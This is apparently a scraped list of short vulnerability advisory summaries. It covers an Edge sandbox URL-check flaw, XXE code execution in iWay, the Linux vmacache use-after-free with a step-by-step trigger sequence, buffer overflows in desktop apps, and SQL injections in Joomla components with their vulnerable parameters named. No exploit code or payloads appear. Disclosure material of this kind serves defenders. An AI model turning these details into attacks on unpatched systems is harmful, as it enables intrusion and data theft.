When spawning a new Edge content process, its privilege is determined by its URL. This URL check is performed by the LCIEUrlPolicy::GetPICForPrivilegedInternalPage method in eModel.dll. The method calls several another methods to check the URL. One of them EdgeUrlUtils::IsAboutFlagsResUri is vulnerable. Since it only checks the scheme and whether the URL ends with "/edgehtml.dll/flags.htm", the following URL which will execute arbitrary JavaScript code will be considered to need to spawn a privileged content process. As a navigation triggered from JavaScript to the "res" scheme is not allowed, an additional renderer exploit is required. I used issue 1588 for it.
iWay Data Quality Suite Web Console provides web services features. As there is no validation present on the web services featured by product while processing the user input an attacker can easily inject external entities in the SOAP request and can achieve the successful Remote Code Execution on the server.
Since commit 615d6e8756c8 ("mm: per-thread vma caching", first in 3.15), Linux has per-task VMA caches that contain up to four VMA pointers for fast lookup. VMA caches are invalidated by bumping the 32-bit per-mm sequence number mm->vmacache_seqnum; when the sequence number wraps, vmacache_flush_all() scans through all running tasks and wipes the VMA caches of all tasks that share current's mm. In commit 6b4ebc3a9078 ("mm,vmacache: optimize overflow system-wide flushing", first in 3.16), a bogus fastpath was added that skips the invalidation on overflow if current->mm->mm_users==1. This means that the following sequence of events triggers a use-after-free: [A starts as a singlethreaded process] A: create mappings X and Y (in separate memory areas far away from other allocations) A: perform repeated invalidations until current->mm->vmacache_seqnum==0xffffffff and current->vmacache.seqnum==0xfffffffe A: dereference an address in mapping Y that is not paged in (thereby populating A's VMA cache with Y at seqnum 0xffffffff) A: unmap mapping X (thereby bumping current->mm->vmacache_seqnum to 0) A: without any more find_vma() calls (which could happen e.g. via pagefaults), create a thread B B: perform repeated invalidations until current->mm->vmacache_seqnum==0xfffffffe B: unmap mapping Y (thereby bumping current->mm->vmacache_seqnum to 0xffffffff) A: dereference an address in the freed mapping Y (or any address that isn't present in the pagetables and doesn't correspond to a valid VMA cache entry)
A buffer overflow vulnerability exists in CrossFont 7.5 when a maliciously crafted License Key/Code is entered into the program, which could allow an attacker to cause a denial of service condition.
A buffer overflow vulnerability exists in Faleemi Desktop Software 1.8.2 when a long string is entered into the 'Device alias' field. An attacker can exploit this vulnerability by running a python exploit script which will create a new file with the name 'exploit.txt' containing the malicious payload. The attacker then needs to copy the content of 'exploit.txt' and paste it into the 'Device alias' field and click on 'Search'. This will result in a calculator pop-up.
An attacker can execute SQL commands through parameters that contain vulnerable. An authorized user can use the filtering feature and can fully authorize the database or other server informations. Parameters 'filter_type_id, filter_pid_id, filter_search' have the same vulnerable. An attacker can use boolean-based blind and error-based payloads to exploit the vulnerability.
Joomla! Component Timetable Schedule 3.6.8 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'eid' in the 'index.php' script. This can allow the attacker to gain access to sensitive information from the database.
A SQL injection vulnerability exists in Joomla! Component Article Factory Manager 4.3.9. An attacker can send a malicious SQL query to the vulnerable parameter 'filter_search' in the 'index.php' script to execute arbitrary SQL commands in the context of the web server.
A SQL injection vulnerability exists in Joomla! Component AlphaIndex Dictionaries 1.0. An attacker can send a specially crafted HTTP POST request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'letter' parameter of the 'index.php?option=com_aindexdictionaries&task=getArticlesPreview' POST request.
Joomla! Component Reverse Auction Factory 4.3.8 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'filter_order_Dir', 'cat' and 'filter_letter' parameters in the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Services By CQR